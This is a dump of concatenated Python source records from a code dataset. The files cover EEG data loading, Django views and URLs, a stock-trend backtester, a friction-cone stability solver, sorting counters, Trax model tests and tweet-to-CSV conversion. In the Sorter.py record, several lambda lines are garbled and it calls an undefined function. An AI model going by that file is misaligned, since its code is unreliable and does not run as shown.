list(zip(self.preloaded_examples_source, self.preloaded_examples_eegs))\n random.shuffle(combined)\n self.preloaded_examples_source, self.preloaded_examples_eegs = zip(*combined)\n else:\n random.shuffle(self.preloaded_examples_eegs)\n\n\nif __name__ == \"__main__\":\n FMD = ForwardModelDataset(10, batch_size=2)\n print(\"EEG Shape\", FMD.getEEGs(1).shape, torch.sum(FMD.getEEGs(1)))\n # print(\"Source shape\", FMD.getSources(1).shape, torch.sum(FMD.getSources(1)))\n FMD.shuffle()\n print(\"EEG Shape\", FMD.getEEGs(1).shape, torch.sum(FMD.getEEGs(1)))\n print(len(FMD))\n # print(\"Source shape\", FMD.getSources(1).shape, torch.sum(FMD.getSources(1)))\n","sub_path":"data_loaders/forward_model_dataloader_one_c.py","file_name":"forward_model_dataloader_one_c.py","file_ext":"py","file_size_in_byte":7064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"401799041","text":"from django.shortcuts import render, HttpResponse\nfrom contactDetail.forms import *\nfrom django.contrib.auth.decorators import login_required\n# Create your views here.\n\n@login_required\ndef contactDetail(request):\n\tif request.method == 'POST':\n\t\tform = contactForm(request.POST)\n\t\tif form.is_valid():\n\t\t\t\n\t\t\taddress1 = form.cleaned_data['address1']\n\t\t\taddress2 = form.cleaned_data['address2']\n\t\t\tstate = form.cleaned_data['state']\n\t\t\tzip_code = form.cleaned_data['zip_code']\n\t\t\tphone = form.cleaned_data['phone']\n\t\t\tform = form.save(commit=False)\n\t\t\tform.user = request.user\n\t\t\tform.save()\n\t\t\t\n\t\t\treturn HttpResponse('thank you')\n\t\t\t\n\telse:\n\t\tform = contactForm()\n\treturn render(request, 'home/contactDetail.html', {\"form\":form})","sub_path":"contactDetail/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"503312881","text":"import pandas as pd\nimport os\nfrom datetime import datetime, timedelta\nimport itertools\nfrom collections import Counter\nfrom functools import reduce\n\ndef str_var(s):\n if s == '-':\n return None\n try:\n return float(s[:-1])*mil[s[-1]]\n except:\n return s\n\ndef getFiles(closing=True, count=0):\n files = sorted([f for f in os.listdir() if len(f) == 16])\n if closing:\n files = [f for f in files if file_dt(f).hour > 13]\n if count > 0: files = files[:-count]\n return files\n\ndef getAboveAverageSectors(df):\n avgs = df.mean()\n sectAvgs = {s: df[df['Sector'] == s].mean() for s in df['Sector'].drop_duplicates()}\n return {avg: [s for s in sectAvgs if sectAvgs[s][avg] > avgs[avg]] for avg in avgs.index}\n\ndef getStocksWithBest(stat, n, df):\n reduce_df = lambda d: d[d >= d.mean()]\n ndf = reduce_df(df[stat])\n while len(ndf) > n:\n ndf = reduce_df(ndf)\n return ndf.keys()#[df.loc[i]['Ticker'] for i in ndf.index]\n\nmil = {'%': 1, 'M': 1e6, 'B': 1e9}\nred = lambda x, y: x.combine(y, lambda l, r: l+[r] if isinstance(l, list) else [l, r])\nfile_dt = lambda f: datetime.strptime(f, '%Y%m%d%H%M.csv')\ndt_file = lambda dt: dt.strftime('%Y%m%d%H%M.csv')\nscoreSectors = lambda df: Counter(itertools.chain.from_iterable(getAboveAverageSectors(df).values()))\nbestStocks = lambda df: Counter(itertools.chain.from_iterable([getStocksWithBest(stat, 20, df) for stat in df.mean().index]))\nbestStockOfBestSector = lambda df: bestStocks(df[df['Sector'] == scoreSectors(df).most_common()[0][0]])\n\ndef findTrends(dfs, stat, cut, filters):\n list_str = lambda l: ''.join(['G' if l[n]*(1+cut) < l[n+1] else 'L' if l[n+1] < l[n]*(1-cut) else '-' for n in range(len(l)-1)])\n return [t for t, v in reduce(red, [df[stat] for df in dfs]).apply(list_str).items() if filters(v)]\n\ndef getGoodPriVolStocks(dfs):\n vols = findTrends(dfs, 'Volume', 0.1, lambda v: 1=3 and 'G' not in v[-2:])\n return find_duplicates([vols, pris])\n\nfiles = getFiles()\ndfs = [pd.read_csv(f).set_index('Ticker').applymap(str_var) for f in files]\n\ndef findTrendTrends(dfs):\n values = {'Volume':[0.1, lambda v: 1=1],\n 'Price':[0.03, lambda v: v.count('L')>=3 and 'G' not in v[-2:]]}\n return find_duplicates([findTrends(dfs, k, v[0], v[1]) for k, v in values.items()])\n\ntot = 1.0\nfor n in range(len(dfs)-6):\n print(file_dt(files[n+5]))\n total = 1.0\n for ticker in findTrendTrends(dfs[n:n+5]):\n change = dfs[n+6].at[ticker, 'Change']\n total*=1+change/100\n tot*=1+change/100\n print(ticker, change)\n print('TOTAL', total)\nprint('Omega Total', tot)\n","sub_path":"Sorter.py","file_name":"Sorter.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"607895344","text":"import numpy as np\nimport math\nfrom scipy import optimize\nimport sys as sys\n\"\"\"This program determines if an assembly of bodies in frictional contact will remain standing. If the assembly stands\nthe program will return the magnitude of the contact force on each edge of each friction cone.\n\nTo use two files are needed. \nFirstly, a body file containing the information in about each body with the following columns:\nmass, x coordinate of cg, y coordinate of cg\nSecondly a contacts file containing information about the contacts between each body should be included. It should \nhave the following columns:\ncontact x coordinate, contact y coordinate, coefficient of friction, first body number, second body number, contact normal\ndirection relative to the first body in radians.\nNote, the ground should be assigned the body number \"0\"\n\nExample usage: \n\nInput filename including the extension for the body data file:\nstanding assembly bodies.csv\nInput filename including the extension for the contact data file:\nstanding assembly contacts.csv\nAssembly stands\nk =[ 3.351 15.538 0. 6.093 0. 27.42 62.456 22.85 ]\n\n\"\"\"\n#save the output in .txt\nclass Logger(object):\n def __init__(self):\n self.terminal = sys.stdout\n self.log = open(\"logfile.log\", \"a\")\n\n def write(self, message):\n self.terminal.write(message)\n self.log.write(message) \n\n def flush(self):\n #this flush method is needed for python 3 compatibility.\n #this handles the flush command by doing nothing.\n #you might want to specify some extra behavior here.\n pass \n\nsys.stdout = Logger()\n# query user for input files\nbody_file = input(\"Input filename including the extension for the body data file:\\n\")\ncontact_file = input(\"Input filename including the extension for the contact data file:\\n\")\n\n# import the bodies and contacts data\nbodies = np.genfromtxt(body_file, delimiter=\",\", skip_header=1)\ncontacts = np.genfromtxt(contact_file, delimiter=\",\", skip_header=1)\n\n# create a matrix of unit forces and their corresponding moments\ncoefficients = np.zeros((3 * bodies.shape[0], contacts.shape[0] * 2 + bodies.shape[0]), dtype=float)\n\nfor body_no, body in enumerate(bodies):\n # select all contacts where one of the bodies in the contact is the selected body\n for contact_no, contact in enumerate(contacts):\n if contact[3] == body_no + 1 or contact[4] == body_no + 1:\n # calculate the angle of each edge of the friction cone\n alpha = math.atan(contact[2])\n theta_1 = contact[5] + alpha\n theta_2 = contact[5] - alpha\n\n # reverse the direction of force for the second body in the contact set except where the first body is ground\n if contact[4] == body_no + 1 and contact[3] != 0:\n direction = -1\n else:\n direction = 1\n\n # calculate the x and y components of the unit vector representing each edge of the friction cone\n # calculate the magnitude of the moment created by the unit force. All moments are about the origin\n N_x1 = math.cos(theta_1) * direction\n N_y1 = math.sin(theta_1) * direction\n m1 = np.cross([contact[0], contact[1]], [N_x1, N_y1])\n N_x2 = math.cos(theta_2) * direction\n N_y2 = math.sin(theta_2) * direction\n m2 = np.cross([contact[0], contact[1]], [N_x2, N_y2])\n\n # add the wrenches for each edge of the friction cone to the coefficients matrix in the correct position\n new_wrenches = np.array([[N_x1, N_y1, float(m1)], [N_x2, N_y2, float(m2)]]).T\n coefficients[body_no*3:body_no*3 + new_wrenches.shape[0], contact_no * 2:contact_no * 2 + new_wrenches.shape[1]] = new_wrenches\n\n # calculate gravitational wrench on the body and add it to the coefficients matrix\n fg_y = -body[0] * 9.81\n mg_y = np.cross([body[1], body[2]], [0, fg_y])\n gravitational_wrench = np.array([0, fg_y, mg_y])\n coefficients[body_no * 3:body_no * 3 + gravitational_wrench.shape[0], contacts.shape[0] * 2 + body_no] = gravitational_wrench.T\n\n# evaluate force closure using the linpro function from the scipy library\nc = [1] * coefficients.shape[1] # Coefficients of the linear objective function to be minimized\n\n# each row should sum to zero\nA_eq = coefficients # array that when multiplied by x gives the values of the equality constraints at x\nb_eq = np.zeros(coefficients.shape[0]) # RHS of each equality constraint in A_eq\n\n# the coefficients for the gravity terms should be equal to 1, coefficients for all other terms should be >=0\nupper_bound = [None] * contacts.shape[0] * 2\nlower_bound = [0] * contacts.shape[0] * 2\nupper_bound += [1] * bodies.shape[0]\nlower_bound += [1] * bodies.shape[0]\n\nresult = optimize.linprog(c, A_eq=A_eq, b_eq=b_eq, bounds=list(zip(lower_bound, upper_bound)), options={'tol': .000001})\nif result.success:\n print('Assembly stands')\n np.set_printoptions(precision=3, suppress=True)\n print(\"k =\" + str(result.x[:-2]))\nelse:\n print(\"Assembly collapses\")\n","sub_path":"Course_5/Project_6/Code/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"29620799","text":"## Name: Allie Blaising \r\n\r\n\r\nimport random\r\nimport time\r\n\r\n\r\ndef selection_sort(ints):\r\n comparison_count = swap_count = 0\r\n for i in range(len(ints) - 1, 0, -1):\r\n position_of_max = 0\r\n for j in range(1, i + 1):\r\n comparison_count += 1\r\n if ints[j] > ints[position_of_max]:\r\n position_of_max = j\r\n ints[i], ints[position_of_max] = ints[position_of_max], ints[i]\r\n return comparison_count \r\n\r\n\r\n\r\ndef insertion_sort(alist):\r\n count = 0\r\n for index in range(1,len(alist)):\r\n count += 1 \r\n currentvalue = alist[index]\r\n position = index\r\n while position > 0 and alist[position - 1] > currentvalue:\r\n alist[position] = alist[position-1]\r\n position = position - 1\r\n count += 1 \r\n alist[position] = currentvalue \r\n return count \r\n\r\n\r\ndef main():\r\n # Give the random number generator a seed, so the same sequence of \r\n # random numbers is generated at each run\r\n #random.seed(1234) \r\n \r\n # Generate 5000 random numbers from 0 to 999,999\r\n randoms = random.sample(range(1000000), 32000)\r\n start_time = time.time() \r\n comps = insertion_sort(randoms)\r\n stop_time = time.time()\r\n print(comps, stop_time - start_time)\r\n\r\nif __name__ == '__main__': \r\n main()\r\n\r\n","sub_path":"sorts.py","file_name":"sorts.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"349108393","text":"# coding=utf-8\n# Copyright 2021 The Trax Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# Lint as: python3\n\"\"\"Tests for Funnel-Transformer models.\"\"\"\n\nfrom absl.testing import absltest\nfrom absl.testing import parameterized\nimport gin\nimport jax\nimport numpy as np\nfrom trax import fastmath\nfrom trax import layers as tl\nfrom trax import shapes\nimport trax.models.research.funnel_transformer as ft\nfrom trax.supervised import decoding\n\n\n# pylint: disable=g-unreachable-test-method\n\n\nclass FunnelTransformerTest(parameterized.TestCase):\n\n def test_mean_pool(self):\n x = np.ones((1, 4, 1))\n x[0, :3, 0] = [5., 2., 4.]\n\n pooling = ft.PoolLayer(tl.AvgPool, (2,), (2,))\n y = pooling(x)\n\n self.assertEqual(y.shape, (1, 2, 1))\n self.assertEqual(y.tolist(), [[[5.], [3.]]])\n\n def test_mask_pool(self):\n x = np.array([1, 0, 0, 1], dtype=bool).reshape((1, 1, 1, 4))\n pooling_cls = ft.MaskPool((2,), (2,))\n y1 = pooling_cls(x)\n\n self.assertEqual(y1.shape, (1, 1, 1, 2))\n self.assertEqual(y1.squeeze().tolist(), [True, False])\n\n pooling_without_cls = ft.MaskPool((2,), (2,), separate_cls=False)\n y2 = pooling_without_cls(x)\n\n self.assertEqual(y2.shape, (1, 1, 1, 2))\n self.assertEqual(y2.squeeze().tolist(), [True, True])\n\n def test_upsampler(self):\n long = np.ones((1, 8, 1))\n short = np.ones((1, 2, 1))\n total_pool_size = long.shape[1] // short.shape[1]\n up_cls = ft._Upsampler(total_pool_size, separate_cls=True)\n up = ft._Upsampler(total_pool_size, separate_cls=False)\n\n y_cls = up_cls([short, long])\n y = up((short, long))\n self.assertEqual(y_cls.shape, long.shape)\n self.assertEqual(y.shape, long.shape)\n\n self.assertEqual(y_cls.squeeze().tolist(), 5*[2] + 3*[1])\n self.assertEqual(y.squeeze().tolist(), 8*[2])\n\n def test_funnel_block_forward_shape(self):\n n_even = 4\n d_model = 8\n\n x = np.ones((1, n_even, d_model), dtype=np.float)\n mask = np.ones((1, n_even), dtype=np.int32)\n\n masker = tl.PaddingMask()\n mask = masker(mask)\n\n block = tl.Serial(\n ft._FunnelBlock(d_model, 8, 2, 0.1, None, 'train', tl.Relu,\n tl.AvgPool, (2,), (2,), separate_cls=True))\n\n xs = [x, mask]\n _, _ = block.init(shapes.signature(xs))\n\n y, _ = block(xs)\n\n self.assertEqual(y.shape, (1, n_even // 2, d_model))\n\n def test_funnel_transformer_encoder_forward_shape(self):\n n_classes = 5\n model = ft.FunnelTransformerEncoder(2, n_classes=n_classes, d_model=8,\n d_ff=8, encoder_segment_lengths=(1, 1),\n n_heads=2, max_len=8)\n\n batch_size = 2\n n_tokens = 4\n x = np.ones((batch_size, n_tokens), dtype=np.int32)\n _ = model.init(shapes.signature(x))\n y = model(x)\n\n self.assertEqual(y.shape, (batch_size, n_classes))\n\n def test_funnel_transformer_forward_shape(self):\n d_model = 8\n vocab_size = 7\n model = ft.FunnelTransformer(7, d_model=d_model, d_ff=8,\n encoder_segment_lengths=(1, 1),\n n_decoder_blocks=1, n_heads=2, max_len=8)\n\n batch_size = 2\n n_tokens = 4\n x = np.ones((batch_size, n_tokens), dtype=np.int32)\n _ = model.init(shapes.signature(x))\n y = model(x)\n\n self.assertEqual(y.shape, (batch_size, n_tokens, vocab_size))\n\n def _check_forward_shape(self, model, input_shape, output_vocab_size):\n x = np.ones(input_shape).astype(np.int32)\n model.init(shapes.signature(x))\n y = model(x)\n self.assertEqual(y.shape, (*input_shape, output_vocab_size))\n\n def test_funnel_transformer_lm_forward_shape(self):\n d_model = 16\n vocab_size = 7\n model = ft.RelformerLM(\n vocab_size,\n shorten_factors=(3,),\n n_funnel_blocks=(2,),\n vanilla_layers=(1, 1),\n d_model=d_model,\n d_ff=d_model,\n n_heads=2,\n )\n\n batch_size, seq_len = 3, 12\n self._check_forward_shape(\n model, input_shape=(batch_size, seq_len), output_vocab_size=vocab_size)\n\n def test_lsh_attention_in_vanilla(self):\n d_model = 16\n vocab_size = 7\n\n gin.bind_parameter('PureLSHSelfAttentionWrapper.pure_lsh_implementation',\n tl.PureLSHSelfAttention)\n gin.bind_parameter('PureLSHSelfAttention.chunk_len', 2)\n\n model = ft.RelformerLM(\n vocab_size,\n shorten_factors=(3,),\n n_funnel_blocks=(2,),\n vanilla_layers=(1, 1),\n d_model=d_model,\n d_ff=d_model,\n n_heads=2,\n vanilla_attn_type=tl.PureLSHSelfAttentionWrapper,\n downsampling_fn=ft.LinearPooling,\n upsampling_fn=ft.LinearUpsampling,\n )\n\n batch_size, seq_len = 3, 12\n self._check_forward_shape(\n model, input_shape=(batch_size, seq_len), output_vocab_size=vocab_size)\n\n def _test_autoregressive_property(self, model, input_shape,\n output_vocab_size):\n rng_1 = jax.random.PRNGKey(0)\n rng_2 = jax.random.PRNGKey(1)\n\n def _get_output_logits(unitialized_eval_model: tl.Layer, x):\n input_signature = shapes.signature(x)\n unitialized_eval_model.init(input_signature, rng=rng_1, use_cache=False)\n\n output_logits, *_ = unitialized_eval_model(x, rng=rng_1)\n return output_logits\n\n def check_autoregressive_property(model):\n with fastmath.use_backend(fastmath.Backend.JAX):\n x_1 = jax.random.randint(rng_1, input_shape, 0, output_vocab_size)\n y_1 = _get_output_logits(model, x_1)\n\n x_2 = jax.random.randint(rng_2, input_shape, 0, output_vocab_size)\n\n for i in range(input_shape[1]):\n masked_x_2 = np.concatenate((x_1[:, :i], x_2[:, i:]), axis=1)\n\n y_2 = _get_output_logits(model, masked_x_2)\n self.assertEqual(y_2.shape[0], input_shape[1])\n np.testing.assert_array_almost_equal(y_1[:i + 1], y_2[:i + 1])\n\n check_autoregressive_property(model)\n\n def test_funnel_transformer_lm_autoregressive_property(self):\n d_model = 8\n vocab_size = 26\n\n model = ft.RelformerLM(\n vocab_size,\n shorten_factors=(3,),\n n_funnel_blocks=(2,),\n vanilla_layers=(1, 1),\n d_model=d_model,\n d_ff=d_model,\n n_heads=2,\n )\n\n input_shape = (1, 12)\n self._test_autoregressive_property(\n model, input_shape, output_vocab_size=vocab_size)\n\n def test_autoregressive_property_vanilla(self):\n d_model = 8\n vocab_size = 26\n\n gin.bind_parameter('trax.layers.SelfAttention.chunk_len', 2)\n model = ft.RelformerLM(\n vocab_size,\n shorten_factors=(3,),\n n_funnel_blocks=(2,),\n vanilla_layers=(1, 1),\n d_model=d_model,\n d_ff=d_model,\n n_heads=2,\n vanilla_attn_type=tl.SelfAttention,\n downsampling_fn=ft.LinearPooling,\n upsampling_fn=ft.LinearUpsampling,\n )\n input_shape = (1, 12)\n self._test_autoregressive_property(\n model, input_shape, output_vocab_size=vocab_size)\n\n def _test_funnel_transformer_lm_forward_shape_predict(self):\n d_model = 8\n vocab_size = 4\n batch_size = 1\n n_len_eval = 42\n attention_type = tl.SelfAttention\n\n shorten_factor = 3\n n_rel_layers = 2\n vanilla_layers = (1, 1)\n n_heads = 2\n\n rel_chunk_len, vanilla_chunk_len = 2, 6\n\n x = np.ones((batch_size, 1)).astype(np.int32)\n gin.bind_parameter('trax.layers.SelfAttention.chunk_len', 20)\n\n predict_funnel = ft.RelformerChunkedLM(\n vocab_size,\n shorten_factor=shorten_factor,\n n_rel_layers=n_rel_layers,\n vanilla_layers=vanilla_layers,\n d_model=d_model,\n d_ff=d_model,\n n_heads=n_heads,\n vanilla_attn_type=attention_type,\n rel_chunk_len=rel_chunk_len,\n vanilla_chunk_len=vanilla_chunk_len,\n max_len=n_len_eval,\n mode='predict')\n\n _, _ = predict_funnel.init(shapes.signature(x))\n\n for _ in range(5):\n y = predict_funnel(x)\n self.assertEqual(y.shape, (batch_size, 1, vocab_size))\n gin.clear_config()\n\n def _test_funnel_transformer_lm_predict_eval_equal(self):\n\n def _test_for_chunk_lens(rel_chunk_len, vanilla_chunk_len):\n d_model = 8\n vocab_size = 4\n batch_size = 1\n n_len_eval = 42\n attention_type = tl.SelfAttention\n\n shorten_factor = 3\n n_rel_layers = 2\n vanilla_layers = (1, 1)\n n_heads = 2\n\n eval_funnel = ft.RelformerChunkedLM(\n vocab_size,\n shorten_factor=shorten_factor,\n n_rel_layers=n_rel_layers,\n vanilla_layers=vanilla_layers,\n d_model=d_model,\n d_ff=d_model,\n n_heads=n_heads,\n vanilla_attn_type=attention_type,\n rel_chunk_len=rel_chunk_len,\n vanilla_chunk_len=vanilla_chunk_len,\n mode='eval')\n\n inputs = jax.random.randint(\n key=jax.random.PRNGKey(0),\n minval=0,\n maxval=vocab_size,\n shape=(batch_size, n_len_eval)).astype(np.int32)\n _, _ = eval_funnel.init(\n shapes.signature(inputs), rng=jax.random.PRNGKey(0))\n y_eval = eval_funnel(inputs)\n self.assertEqual(y_eval.shape, (batch_size, n_len_eval, vocab_size))\n\n if attention_type == tl.SelfAttention:\n gin.bind_parameter('trax.layers.SelfAttention.chunk_len', n_len_eval)\n\n predict_funnel = ft.RelformerChunkedLM(\n vocab_size,\n shorten_factor=shorten_factor,\n n_rel_layers=n_rel_layers,\n vanilla_layers=vanilla_layers,\n d_model=d_model,\n d_ff=d_model,\n n_heads=n_heads,\n vanilla_attn_type=attention_type,\n rel_chunk_len=rel_chunk_len,\n vanilla_chunk_len=vanilla_chunk_len,\n mode='predict')\n\n inputs = np.concatenate(\n [np.zeros((batch_size, 1)).astype(np.int32), inputs], axis=1)\n inputs = inputs[:, :-1]\n\n _, _ = predict_funnel.init(\n shapes.signature(inputs[:, 0:1]),\n rng=jax.random.PRNGKey(0),\n use_cache=False)\n\n for i in range(n_len_eval):\n y = predict_funnel(inputs[:, i:i + 1])\n np.testing.assert_array_almost_equal(\n y, y_eval[:, i:i + 1, :], decimal=5)\n\n _test_for_chunk_lens(rel_chunk_len=None, vanilla_chunk_len=None)\n _test_for_chunk_lens(rel_chunk_len=2, vanilla_chunk_len=6)\n\n def _test_autoregressive_sample_relformerlm(self):\n batch_size = 4\n max_length = 5\n model = ft.RelformerChunkedLM(\n 10,\n d_model=8,\n d_ff=16,\n n_rel_layers=1,\n vanilla_layers=(1, 1),\n shorten_factor=3,\n n_heads=2,\n mode='predict')\n model.init(shapes.ShapeDtype((batch_size, 1), dtype=np.int32))\n s1 = decoding.autoregressive_sample(\n model,\n batch_size=batch_size,\n eos_id=-1,\n max_length=max_length,\n accelerate=False)\n self.assertEqual(s1.shape, (batch_size, max_length))\n\n\nif __name__ == '__main__':\n absltest.main()\n","sub_path":"trax/models/research/funnel_transformer_test.py","file_name":"funnel_transformer_test.py","file_ext":"py","file_size_in_byte":11404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"113737999","text":"import csv\nfrom os import listdir\nfrom os.path import isfile, join\nfrom hoover.simple import read_simple\n\n\nFIELDS_TWEET = ('created_at',\n 'timestamp',\n 'id',\n 'text',\n 'retweet_count',\n 'favorite_count',\n 'lang')\n\n\nFIELDS_USER = ('user_id', 'user_screen_name')\n\n\nFIELDS_ALL = ('reply', 'retweet', 'quote')\n\n\nFIELDS_REPLY = ('in_reply_to_status_id',\n 'in_reply_to_user_id',\n 'in_reply_to_screen_name')\n\n\nFIELDS_PARENT_TWEET = ('quoted_text',)\n\n\nFIELDS_RETWEET = ('retweeted_id',\n 'retweeted_user_id',\n 'retweeted_user_screen_name')\n\n\nFIELDS_QUOTE = ('quoted_id',\n 'quoted_user_id',\n 'quoted_user_screen_name')\n\n\ndef _matches_filter(csv_type, tweet):\n if csv_type in {'all', 'hashtags', 'mentions'}:\n return True\n elif csv_type == 'tweets':\n return ((not tweet['reply']) and\n (not tweet['retweet']) and\n (not tweet['quote']))\n elif csv_type == 'replies':\n return tweet['reply']\n elif csv_type == 'retweets':\n return tweet['retweet']\n elif csv_type == 'quotes':\n return tweet['quote']\n raise RuntimeError('Unknown csv type: {}.'.format(csv_type))\n\n\ndef tweets_to_csv(tweets, outfile, csv_type='all', user_data=True):\n base_fields = FIELDS_TWEET\n if user_data:\n base_fields += FIELDS_USER\n\n if csv_type == 'all':\n fields = (base_fields + FIELDS_PARENT_TWEET + FIELDS_ALL +\n FIELDS_REPLY + FIELDS_RETWEET + FIELDS_QUOTE)\n elif csv_type == 'tweets':\n fields = base_fields\n elif csv_type == 'replies':\n fields = base_fields + FIELDS_REPLY\n elif csv_type == 'retweets':\n fields = base_fields + FIELDS_PARENT_TWEET + FIELDS_RETWEET\n elif csv_type == 'quotes':\n fields = base_fields + FIELDS_PARENT_TWEET + FIELDS_QUOTE\n else:\n raise RuntimeError('Unknown csv type: {}'.format(csv_type))\n\n if user_data:\n fields += FIELDS_USER\n\n with open(outfile, 'w') as outfile:\n csvwriter = csv.writer(outfile)\n csvwriter.writerow(fields)\n for tweet in tweets:\n csvwriter.writerow([tweet[field] for field in fields])\n\n return 1\n\n\ndef hashtags(tweets, outfile, user_data):\n counts = {}\n for tweet in tweets:\n user = tweet['user_screen_name']\n if user not in counts:\n counts[user] = {}\n for occurrence in tweet['hashtags']:\n if occurrence not in counts[user]:\n counts[user][occurrence] = 0\n counts[user][occurrence] += 1\n\n if len(counts) == 0:\n return 0\n\n fields = ('hashtag', 'occurrences')\n if user_data:\n fields = ('user',) + fields\n\n with open(outfile, 'w') as outfile:\n csvwriter = csv.writer(outfile)\n csvwriter.writerow(fields)\n\n for user in counts:\n for occurrence in counts[user]:\n row = {'user': user,\n 'hashtag': occurrence,\n 'occurrences': counts[user][occurrence]}\n csvwriter.writerow([row[field] for field in fields])\n\n return 1\n\n\ndef mentions(tweets, outfile, user_data):\n counts = {}\n for tweet in tweets:\n user = tweet['user_screen_name']\n if user not in counts:\n counts[user] = {}\n for occurrence in tweet['mentions']:\n if occurrence not in counts[user]:\n counts[user][occurrence] = 0\n counts[user][occurrence] += 1\n\n if len(counts) == 0:\n return 0\n\n fields = ('mentioned_id', 'mentioned_screen_name', 'occurrences')\n if user_data:\n fields = ('user',) + fields\n\n with open(outfile, 'w') as outfile:\n csvwriter = csv.writer(outfile)\n csvwriter.writerow(fields)\n\n for user in counts:\n for occurrence in counts[user]:\n row = {'user': user,\n 'mentioned_id': occurrence[0],\n 'mentioned_screen_name': occurrence[1],\n 'occurrences': counts[user][occurrence]}\n csvwriter.writerow([row[field] for field in fields])\n\n return 1\n\n\ndef json_file_to_csv(infile, outfile, csv_type='all', user_data=True):\n tweets = tuple(tweet for tweet in read_simple(infile)\n if _matches_filter(csv_type, tweet))\n if len(tweets) == 0:\n return 0\n\n if csv_type == 'hashtags':\n return hashtags(tweets, outfile, user_data)\n elif csv_type == 'mentions':\n return mentions(tweets, outfile, user_data)\n else:\n return tweets_to_csv(tweets, outfile, csv_type, user_data)\n\n\ndef dir_to_csvs(indir, outdir, csv_type='all'):\n files = [f for f in listdir(indir) if isfile(join(indir, f))]\n n = 0\n for file in files:\n if file[-5:] == '.json':\n infile = join(indir, file)\n outfile = '{}-{}.csv'.format(file[:-5], csv_type)\n outfile = join(outdir, outfile)\n n += json_file_to_csv(\n infile, outfile, csv_type, user_data=False)\n return n\n\n\ndef to_csv(infile, outfile, indir, outdir, csv_type):\n if csv_type:\n filters = {csv_type}\n else:\n filters = ('all', 'tweets',\n 'replies', 'retweets', 'quotes',\n 'hashtags', 'mentions')\n\n print('Using filters: {}.'.format(', '.join(filters)))\n\n n = 0\n if indir:\n if infile:\n raise RuntimeError(\n 'Only one of --infile or --indir should be provided.')\n if outfile:\n raise RuntimeError(\n 'Only one of --outfile or --indir should be provided.')\n if not outdir:\n raise RuntimeError('--outdir must be provided.')\n for filt in filters:\n print('Converting to csv type: {}'.format(filt))\n n += dir_to_csvs(indir, outdir, filt)\n elif infile:\n if indir:\n raise RuntimeError(\n 'Only one of --infile or --indir should be provided.')\n if outdir:\n raise RuntimeError(\n 'Only one of --infile or --outdir should be provided.')\n if not outfile:\n raise RuntimeError('--outfile must be provided.')\n for filt in filters:\n print('Converting to csv type: {}'.format(filt))\n n += json_file_to_csv(infile, outfile, filt)\n else:\n raise RuntimeError('Either --infile or --indir must be provided.')\n\n print('{} csv files created.'.format(str(n)))\n","sub_path":"hoover/csv.py","file_name":"csv.py","file_ext":"py","file_size_in_byte":6595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"132433869","text":"import turtle\nt=turtle.Pen()\nt.pensize(2)\nt.begin_fill()\nt.color ('purple')\nfor i in range(360):\n t.forward(1)\n t.right(1)\nt.end_fill()\nt.hideturtle()\nturtle.mainloop()\n\n","sub_path":"trtl2.py","file_name":"trtl2.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"485687237","text":"import os\nimport numpy\n\nif __name__ == '__main__':\n loadpath = 'E:/ProjectData_LIDC/EnsembleResult/SameData(Times=40)-Result/'\n partname = 'All_%s.csv'\n\n for part in ['AdaBoost', 'Gaussian', 'SVC', 'Tree']:\n if not os.path.exists(os.path.join(loadpath, partname % part)):\n print()\n continue\n data = numpy.genfromtxt(fname=os.path.join(loadpath, partname % part), dtype=float, delimiter=',')\n assembly = numpy.sum(data, axis=1)\n for index in range(1, 5):\n print(data[numpy.argmax(assembly)][index], end='\\t')\n print()\n","sub_path":"LIDC_201905/BestChoose.py","file_name":"BestChoose.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"226381545","text":"from django.urls import path\nfrom catalog.views import (\n gallery_detail_page,\n prestige\n)\nfrom . import views\nfrom django.conf.urls import url\n\n\n\nurlpatterns = [\n path('', views.index, name='index'),\n url(r'^weapons/$', views.BookListView.as_view(), name='weapons'),\n url(r'^weapon/(?P\\d+)$', views.BookDetailView.as_view(), name='book-detail'),\n url(r'^authors/$', views.AuthorListView.as_view(), name='authors'),\n url(r'^author/(?P\\d+)$', views.AuthorDetailView.as_view(), name='author-detail'),\n url(r'^testing/$', views.testing, name='testing'),\n url(r'^rifles/$', views.RifleListView.as_view(), name = 'rifles'),\n url(r'^rifle/(?P\\d+)$', views.RifleDetailView.as_view(), name='rifles-detail'),\n url('gallery/', gallery_detail_page, name = 'gallery'),\n url('allweapons', views.weapons, name='allweapons'),\n url('prestige/', prestige, name = 'prestige'),\n ]\n","sub_path":"catalog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"51805115","text":"#!/usr/bin/env python\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# You may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# http://www.apache.org/licenses/LICENSE-2.0OA\n#\n# Authors:\n# - Wen Guan, , 2019 - 2020\n\n\n\"\"\"\noperations related to Processings.\n\"\"\"\n\nimport datetime\n\nimport sqlalchemy\nfrom sqlalchemy.exc import DatabaseError, IntegrityError\nfrom sqlalchemy.sql.expression import 